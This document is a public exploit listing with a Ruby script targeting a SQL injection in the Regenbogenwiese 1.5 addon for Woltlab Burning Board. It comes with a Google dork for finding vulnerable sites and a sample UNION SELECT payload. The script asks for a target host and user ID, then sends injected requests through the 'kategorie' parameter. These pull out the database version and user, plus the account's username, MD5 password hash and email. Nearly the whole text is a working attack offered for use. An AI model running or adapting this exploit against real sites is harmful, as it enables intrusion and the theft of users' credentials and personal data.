# Exploit Title: Woltlab Burning Board Regenbogenwiese 2007 Addon SQL Injection Exploit # Google Dork: inurl:regenbogenwiese.php wbb (and more) # Date: 04.09.2013 # Exploit Author: Easy Laster # Software Name: Regenbogenwiese v1.5 © 2007 by DieKrabbe # Version: 1.5 # Tested on: Windows 8/Backtrack # #!/usr/bin/ruby #secunet.cc #30.07.2013 #regenbogenwiese.php?kategorie='+union+select #+1,1,1,1,1,1,concat(database(),0x3a,user(),0x #3a,userid,0x3a,password,0x3a,username,0x3a,em #ail),1,1,1,1,1,1,1,1+bb1_users+where+userid=1--+ #Discovered and Vulnerability by Easy Laster print " ################################################################ # secunet.cc # ################################################################ #PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT# #Woltlab Burning Board Regenbogenwiese 2007 Addon SQL Injection# # (regenbogenwiese.php, kategorie param) # # Exploit # # Using Host+Path+id # # www.demo.de + /wbb/ + or + / + 1 # # Easy Laster # #PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT# ################################################################ " require 'net/http' block = "################################################################" print ""+ block +"" print "\nEnter Target Name (site.com)->" host=gets.chomp print ""+ block +"" print "\nEnter Script Path (/wbb/ or /)->" path=gets.chomp print ""+ block +"" print "\nEnter The ID From User (id)->" userid=gets.chomp print ""+ block +"" begin dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat(0x27,0x7e,"+ "0x27,version(),0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+where+userid="+ ""+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nVersion Database -> "+(/'~'(.+)'~'/).match(resp.body)[1] dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,conc"+ "at(0x27,0x7e,0x27,user(),0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users"+ "+where+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nDatabase User -> "+(/'~'(.+)'~'/).match(resp.body)[1] dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+ "(0x27,0x7e,0x27,userid,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+wh"+ "ere+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nID Account -> "+(/'~'(.+)'~'/).match(resp.body)[1] dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+ "(0x27,0x7e,0x27,username,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+w"+ "here+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nUsername Account -> "+(/'~'(.+)'~'/).match(resp.body)[1] dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+ "(0x27,0x7e,0x27,password,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+w"+ "here+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nPassword Account MD5 -> "+(/'~'(.+)'~'/).match(resp.body)[1] dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,conc"+ "at(0x27,0x7e,0x27,email,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+"+ "where+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nEmail Adresse Account -> "+(/'~'(.+)'~'/).match(resp.body)[1] print "\n" print ""+ block +"" print "\n" print " ################################################################ # Greetings # ################################################################ -#------------------------+ | | #---------------------+ -#------------------------+ _|_|_ #---------------------+ -#------------------------+ (o o) #---------------------+ -#------------------------+ooO--(_)--Ooo-#---------------------+ ################################################################ " rescue print "\nExploit Failed" end